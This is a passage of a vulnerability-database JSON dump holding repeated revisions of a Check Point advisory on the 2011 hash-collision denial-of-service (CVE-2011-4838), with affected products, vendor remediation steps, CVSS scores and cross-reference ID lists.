"REDHAT-RHSA-2012-0069.NASL", "GENTOO_GLSA-201207-06.NASL", "F5_BIGIP_SOL13588.NASL", "SL_20120130_RUBY_ON_SL4_X.NASL", "FEDORA_2012-0504.NASL", "SOLARIS11_RUBY_20120417.NASL", "ASP_NET_HASH_COLLISION_DOS.NBIN", "SL_20120130_RUBY_ON_SL6_X.NASL", "ORACLELINUX_ELSA-2012-0070.NASL", "DEBIAN_DLA-209.NASL", "FEDORA_2011-17551.NASL", "MANDRIVA_MDVSA-2012-024.NASL", "ALA_ALAS-2012-35.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "centos", "idList": ["CESA-2012:0093", "CESA-2012:0070", "CESA-2012:0069"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:6D8EE20EB6", "FEDORA:A38F421375", "FEDORA:76D5120DE0", "FEDORA:7F79620D03", "FEDORA:BFF2C21133"]}, {"type": "amazon", "idList": ["ALAS-2012-035"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0069", "ELSA-2012-0070"]}, {"type": "redhat", "idList": ["RHSA-2012:0070", "RHSA-2012:0069"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:3C908", "DEBIAN:DLA-209-1:6EC99"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108294", "PACKETSTORM:108287"]}, {"type": "exploitdb", "idList": ["EDB-ID:18305", "EDB-ID:18296"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "rubygems", "idList": ["RUBY:RUBY-2011-4815-78118", "RUBY:JRUBY-2011-4838-78116"]}], "modified": "2021-11-25T15:18:11", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-11-25T15:18:11", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}]}, "lastseen": "2021-11-25T15:18:11", "differentElements": ["modified", "published"], "edition": 44}, {"bulletin": {"id": "CPS:SK66350", "vendorId": null, "hash": "cfdde2d0d2a7ecab5dccde9688c57e9c", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-29T22:00:00", "modified": "2011-12-29T22:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-25T23:08:27", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cert", "idList": ["VU:903934"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-4815", "UB:CVE-2011-4838", "UB:CVE-2011-4885"]}, {"type": "cve", "idList": ["CVE-2011-4815", "CVE-2011-3414", "CVE-2011-4838", "CVE-2011-4885"]}, {"type": "f5", "idList": ["F5:K13588", "SOL13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/", "MSF:ILITIES/JUNIPER-JUNOS-OS-JSA10522/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2013-033", "CPAI-2014-1022", "CPAI-2012-001"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27500", "SECURITYVULNS:DOC:27501"]}, {"type": "seebug", "idList": ["SSV:26126", "SSV:26122", "SSV:26121", "SSV:72454", "SSV:30001"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "openvas", "idList": ["OPENVAS:863706", "OPENVAS:1361412562310863963", "OPENVAS:863713", "OPENVAS:136141256231070754", "OPENVAS:1361412562310831554", "OPENVAS:70754", "OPENVAS:863735", "OPENVAS:1361412562310122001", "OPENVAS:870638", "OPENVAS:870539", "OPENVAS:1361412562310881167", "OPENVAS:870529", "OPENVAS:1361412562310863921", "OPENVAS:136141256231071568", "OPENVAS:863921", "OPENVAS:881226", "OPENVAS:863712", "OPENVAS:1361412562310122002", "OPENVAS:831554", "OPENVAS:881075", "OPENVAS:863681", "OPENVAS:1361412562310870638", "OPENVAS:1361412562310881095", "OPENVAS:71568", "OPENVAS:881167", "OPENVAS:1361412562310863681", "OPENVAS:1361412562310120218"]}, {"type": "nessus", "idList": ["FEDORA_2012-0420.NASL", "PHP_5_HASH_COLLISION_DOS.NBIN", "FEDORA_2011-17542.NASL", "ORACLELINUX_ELSA-2012-0069.NASL", "CENTOS_RHSA-2012-0069.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "CENTOS_RHSA-2012-0070.NASL", "REDHAT-RHSA-2012-0070.NASL", "REDHAT-RHSA-2012-0069.NASL", "GENTOO_GLSA-201207-06.NASL", "F5_BIGIP_SOL13588.NASL", "SL_20120130_RUBY_ON_SL4_X.NASL", "FEDORA_2012-0504.NASL", "SOLARIS11_RUBY_20120417.NASL", "ASP_NET_HASH_COLLISION_DOS.NBIN", "SL_20120130_RUBY_ON_SL6_X.NASL", "ORACLELINUX_ELSA-2012-0070.NASL", "DEBIAN_DLA-209.NASL", "FEDORA_2011-17551.NASL", "MANDRIVA_MDVSA-2012-024.NASL", "ALA_ALAS-2012-35.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "centos", "idList": ["CESA-2012:0093", "CESA-2012:0070", "CESA-2012:0069"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:6D8EE20EB6", "FEDORA:A38F421375", "FEDORA:76D5120DE0", "FEDORA:7F79620D03", "FEDORA:BFF2C21133"]}, {"type": "amazon", "idList": ["ALAS-2012-035"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0069", "ELSA-2012-0070"]}, {"type": "redhat", "idList": ["RHSA-2012:0070", "RHSA-2012:0069"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:3C908", "DEBIAN:DLA-209-1:6EC99"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108294", "PACKETSTORM:108287"]}, {"type": "exploitdb", "idList": ["EDB-ID:18305", "EDB-ID:18296"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "rubygems", "idList": ["RUBY:RUBY-2011-4815-78118", "RUBY:JRUBY-2011-4838-78116"]}], "modified": "2021-11-25T15:18:11", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-11-25T15:18:11", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}]}, "lastseen": "2021-11-25T23:08:27", "differentElements": ["modified", "published"], "edition": 45}, {"bulletin": {"id": "CPS:SK66350", "vendorId": null, "hash": "fc0b35930d07b486d73f615d467b0b5b", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-30T08:00:00", "modified": "2011-12-30T08:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-26T03:12:42", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cert", "idList": ["VU:903934"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-4885", "UB:CVE-2011-4815", "UB:CVE-2011-4838"]}, {"type": "cve", "idList": ["CVE-2011-4885", "CVE-2011-4838", "CVE-2011-4815", "CVE-2011-3414"]}, {"type": "f5", "idList": ["SOL13588", "F5:K13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/", "MSF:ILITIES/JUNIPER-JUNOS-OS-JSA10522/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/", "MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2012-001", "CPAI-2014-1022"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27500", "SECURITYVULNS:DOC:27501"]}, {"type": "seebug", "idList": ["SSV:30001", "SSV:72454", "SSV:26122", "SSV:26121", "SSV:26126"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "openvas", "idList": ["OPENVAS:863735", "OPENVAS:870638", "OPENVAS:863681", "OPENVAS:1361412562310863954", "OPENVAS:1361412562310870638", "OPENVAS:70735", "OPENVAS:864015", "OPENVAS:1361412562310881119", "OPENVAS:1361412562310863681", "OPENVAS:1361412562310863921", "OPENVAS:1361412562310122001", "OPENVAS:1361412562310881167", "OPENVAS:71568", "OPENVAS:881167", "OPENVAS:136141256231070754", "OPENVAS:1361412562310863963", "OPENVAS:831554", "OPENVAS:1361412562310122002", "OPENVAS:70754", "OPENVAS:1361412562310863815", "OPENVAS:863921", "OPENVAS:863742", "OPENVAS:136141256231070735", "OPENVAS:1361412562310120218", "OPENVAS:136141256231071568", "OPENVAS:1361412562310831554"]}, {"type": "nessus", "idList": ["FEDORA_2012-0420.NASL", "CENTOS_RHSA-2012-0069.NASL", "REDHAT-RHSA-2012-0070.NASL", "ASP_NET_HASH_COLLISION_DOS.NBIN", "ORACLELINUX_ELSA-2012-0069.NASL", "FEDORA_2011-17551.NASL", "ALA_ALAS-2012-35.NASL", "SL_20120130_RUBY_ON_SL4_X.NASL", "MANDRIVA_MDVSA-2011-197.NASL", "GENTOO_GLSA-201207-06.NASL", "SOLARIS11_RUBY_20120417.NASL", "FEDORA_2012-0504.NASL", "CENTOS_RHSA-2012-0070.NASL", "FEDORA_2011-17542.NASL", "SL_20120130_RUBY_ON_SL6_X.NASL", "PHP_5_HASH_COLLISION_DOS.NBIN", "REDHAT-RHSA-2012-0069.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "ORACLELINUX_ELSA-2012-0070.NASL", "FEDORA_2012-1301.NASL", "F5_BIGIP_SOL13588.NASL", "DEBIAN_DLA-209.NASL", "MANDRIVA_MDVSA-2012-024.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "centos", "idList": ["CESA-2012:0069", "CESA-2012:0093", "CESA-2012:0070"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:BFF2C21133", "FEDORA:6D8EE20EB6", "FEDORA:6D55C20D95"]}, {"type": "amazon", "idList": ["ALAS-2012-035", "ALAS-2012-037"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0069", "ELSA-2012-0070"]}, {"type": "redhat", "idList": ["RHSA-2012:0069", "RHSA-2012:0070", "RHSA-2012:0092"]}, {"type": "exploitdb", "idList": ["EDB-ID:18305", "EDB-ID:18296"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108287", "PACKETSTORM:108294"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:3C908", "DEBIAN:DLA-209-1:6EC99"]}, {"type": "rubygems", "idList": ["RUBY:RUBY-2011-4815-78118", "RUBY:JRUBY-2011-4838-78116"]}], "modified": "2021-11-26T03:12:42", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-11-26T03:12:42", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}]}, "lastseen": "2021-11-26T03:12:42", "differentElements": ["modified", "published"], "edition": 46}, {"bulletin": {"id": "CPS:SK66350", "vendorId": null, "hash": "cfdde2d0d2a7ecab5dccde9688c57e9c", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security Server**\n\nTo protect an Endpoint Security Server from this vulnerability run the\nfollowing commands on the Endpoint Security Server machine:\n\n 1. Run: **cpstop**\n 2. Run: **cd %UEPMDIR%\\engine\\conf**\n 3. Run: **copy server.xml server.xml.bak**\n 4. Remove the following line from _server.xml_ : **< Context docBase=\"WRH\" path=\"/webrh\" reloadable=\"false\"/>**\n 5. Run: **cpstart**\n\n**Solution for Integrity Server**\n\n[Contact Check Point\nSupport](http://www.checkpoint.com/services/contact/index.html) to get a\nHotfix for this issue. \nA Support Engineer will make sure the Hotfix is compatible with your\nenvironment before providing the Hotfix.\n\nCheck Point recommends to always protect management servers behind a Security\nGateway.\n\n**IPS protection**\n\nTo protect web applications behind the Security Gateway, Check Point suggests\nenabling the \"Microsoft IIS Repeated Parameters Request Denial of Service\"\nprotection. Check Point also released advisory\n[CPAI-2011-593](http://www.checkpoint.com/defense/advisories/public/2011/cpai-29-dec.html)\nwith specific instructions.\n\nThis pre-emptive IPS protection released in September 2010 will block this\nattack.\n\n", "published": "2011-12-29T22:00:00", "modified": "2011-12-29T22:00:00", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.8, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C", "version": "2.0"}, "exploitabilityScore": 10.0, "impactScore": 6.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "href": "https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk66350", "reporter": "Check Point Security Alerts", "references": [], "cvelist": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4838", "CVE-2011-4885"], "immutableFields": [], "lastseen": "2021-11-27T11:17:11", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cert", "idList": ["VU:903934"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2011-4885", "UB:CVE-2011-4815", "UB:CVE-2011-4838"]}, {"type": "cve", "idList": ["CVE-2011-3414", "CVE-2011-4815", "CVE-2011-4885", "CVE-2011-4838"]}, {"type": "f5", "idList": ["SOL13588", "F5:K13588"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4885/", "MSF:ILITIES/APPLE-OSX-PHP-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4885/", "MSF:ILITIES/CENTOS_LINUX-CVE-2011-4815/", "MSF:ILITIES/JUNIPER-JUNOS-OS-JSA10522/", "MSF:ILITIES/APPLE-OSX-LOGINWINDOW-CVE-2011-4815/"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2014-1022", "CPAI-2013-033", "CPAI-2012-001"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27501", "SECURITYVULNS:DOC:27500"]}, {"type": "seebug", "idList": ["SSV:30071", "SSV:72454", "SSV:26121", "SSV:26122", "SSV:30001", "SSV:26126"]}, {"type": "freebsd", "idList": ["91BE81E7-3FEA-11E1-AFC7-2C4138874F7D"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310122001", "OPENVAS:863963", "OPENVAS:1361412562310870529", "OPENVAS:1361412562310863921", "OPENVAS:831554", "OPENVAS:1361412562310870638", "OPENVAS:1361412562310120218", "OPENVAS:881167", "OPENVAS:71568", "OPENVAS:70754", "OPENVAS:1361412562310120256", "OPENVAS:870638", "OPENVAS:136141256231070754", "OPENVAS:863921", "OPENVAS:863712", "OPENVAS:870542", "OPENVAS:1361412562310881167", "OPENVAS:1361412562310863706", "OPENVAS:863815", "OPENVAS:870529", "OPENVAS:1361412562310881095", "OPENVAS:1361412562310831554", "OPENVAS:863681", "OPENVAS:136141256231071568", "OPENVAS:1361412562310881226", "OPENVAS:1361412562310122002", "OPENVAS:1361412562310863681"]}, {"type": "nessus", "idList": ["REDHAT-RHSA-2012-0019.NASL", "SL_20120130_RUBY_ON_SL6_X.NASL", "GENTOO_GLSA-201207-06.NASL", "CENTOS_RHSA-2012-0069.NASL", "FEDORA_2011-17551.NASL", "ASP_NET_HASH_COLLISION_DOS.NBIN", "SOLARIS11_RUBY_20120417.NASL", "F5_BIGIP_SOL13588.NASL", "DEBIAN_DLA-209.NASL", "ORACLELINUX_ELSA-2012-0069.NASL", "ALA_ALAS-2012-35.NASL", "FREEBSD_PKG_91BE81E73FEA11E1AFC72C4138874F7D.NASL", "REDHAT-RHSA-2012-0070.NASL", "MANDRIVA_MDVSA-2012-024.NASL", "ORACLELINUX_ELSA-2012-0070.NASL", "FEDORA_2012-0420.NASL", "CENTOS_RHSA-2012-0070.NASL", "FEDORA_2012-0504.NASL", "FEDORA_2011-17542.NASL", "REDHAT-RHSA-2012-0069.NASL", "PHP_5_HASH_COLLISION_DOS.NBIN", "SL_20120130_RUBY_ON_SL4_X.NASL"]}, {"type": "gentoo", "idList": ["GLSA-201207-06"]}, {"type": "centos", "idList": ["CESA-2012:0069", "CESA-2012:0070"]}, {"type": "jvn", "idList": ["JVN:90615481"]}, {"type": "fedora", "idList": ["FEDORA:6097820D6A", "FEDORA:6D8EE20EB6", "FEDORA:BFF2C21133"]}, {"type": "amazon", "idList": ["ALAS-2012-035"]}, {"type": "oraclelinux", "idList": ["ELSA-2012-0069", "ELSA-2012-0070"]}, {"type": "redhat", "idList": ["RHSA-2012:0070", "RHSA-2012:0092", "RHSA-2012:0069"]}, {"type": "exploitdb", "idList": ["EDB-ID:18296", "EDB-ID:18305"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:B8DA2EAADC9FCF2EF821731BB51E75E7"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:108294", "PACKETSTORM:108287"]}, {"type": "debian", "idList": ["DEBIAN:DLA-209-1:3C908", "DEBIAN:DLA-209-1:6EC99"]}, {"type": "rubygems", "idList": ["RUBY:RUBY-2011-4815-78118", "RUBY:JRUBY-2011-4838-78116"]}], "modified": "2021-11-27T11:17:11", "rev": 2}, "score": {"value": 7.0, "vector": "NONE", "modified": "2021-11-27T11:17:11", "rev": 2}}, "objectVersion": "1.6", "affectedSoftware": [{"version": "R71", "operator": "eq", "name": "quantum security gateways"}, {"version": "R75", "operator": "eq", "name": "quantum security gateways"}, {"version": "R71", "operator": "eq", "name": "endpoint security server"}, {"version": "R75", "operator": "eq", "name": "endpoint security server"}, {"version": "R71", "operator": "eq", "name": "mobile access / ssl vpn"}, {"version": "R75", "operator": "eq", "name": "mobile access / ssl vpn"}]}, "lastseen": "2021-11-27T11:17:11", "differentElements": ["modified", "published"], "edition": 47}, {"bulletin": {"id": "CPS:SK66350", "vendorId": null, "hash": "fc0b35930d07b486d73f615d467b0b5b", "type": "checkpoint_security", "bulletinFamily": "software", "title": "Check Point response to \"DoS through hash table against Web Application Platforms\" (CVE-2011-4838)", "description": "Symptoms\n\n * On December 28, 2011, at the CCC conference, a new algorithmic complexity attack against hash table mechanisms of multiple web application platforms was published. \n \n\n * For technical details please refer to the following information: \n\n * <http://www.nruns.com/_downloads/advisory28122011.pdf>\n * <http://events.ccc.de/congress/2011/Fahrplan/attachments/2007_28C3_Effective_DoS_on_web_application_platforms.pdf>\n * Related CVEs: CVE-2011-4815, CVE-2011-3414, and CVE-2011-4885\n \n \n\n * To address this vulnerability, Check Point released a HotFix and an IPS protection. \n\nSolution\n\nThe following products are **not** vulnerable:\n\n * Security Gateway \n * Versions: R70 and earlier \n * Platforms: Windows OS and Solaris OS for all gateway versions (including R71 and R75) \n * Applications: SecurePlatform WebUI, SmartPortal, IPSO Voyager on all gateway versions (including R71 and R75) \n\nThe following products are **vulnerable** :\n\n * Security Gateway \n * Versions: R71, R75, R75.10\n * Platforms: SecurePlatform, IPSO \n * Vulnerable applications: Mobile Access Blade, DLP, Identity Awareness and UserCheck portals \n * Endpoint Security Server - all versions \n * Integrity Server - all versions \n * Connectra - all versions \n\n**Solution for Security Gateway and Connectra portals**\n\nTo protect a Security Gateway from this vulnerability follow the instructions\nbelow:\n\n * Download [SG_HotFix_CVE-2011-4838.sh](https://supportcenter.checkpoint.com/supportcenter/portal?action=portlets.DCFileAction&eventSubmit_doGetdcdetails=&fileid=13554 \"HotFix\") and copy it to the Security Gateway. \n * Run: SG_HotFix_CVE-2011-4838.sh \n\n**Solution for Endpoint Security 